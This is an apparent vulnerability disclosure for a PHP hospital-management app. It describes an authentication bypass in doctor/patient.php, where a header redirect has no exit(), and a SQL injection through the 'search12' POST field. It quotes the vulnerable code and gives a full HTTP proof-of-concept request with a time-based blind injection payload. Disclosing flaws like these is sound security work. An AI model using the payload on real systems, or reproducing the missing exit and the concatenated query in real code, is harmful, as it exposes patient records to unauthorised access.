Found a vulnerability

[0clickjacking0]

Vulnerability file address

doctor/patient.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http

......
......
......
session_start();

    if(isset($_SESSION["user"])){
        if(($_SESSION["user"])=="" or $_SESSION['usertype']!='d'){
            header("location: ../login.php");
        }else{
            $useremail=$_SESSION["user"];
        }

    }else{
        header("location: ../login.php");
    }
......
......
......

doctor/patient.php from line 107,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 151 $list11 = $database->query($sqlmain); causes sql injection

......
......
......
  if($_POST){

    if(isset($_POST["search"])){
      $keyword=$_POST["search12"];

      $sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
      $selecttype="my";
    }
......
......
......

    <?php
      echo '<datalist id="patient">';
    $list11 = $database->query($sqlmain);
......
......
......

POC

POST /doctor/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1

search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(5)))PKsU) AND 'rUxx'='rUxx

Attack results pictures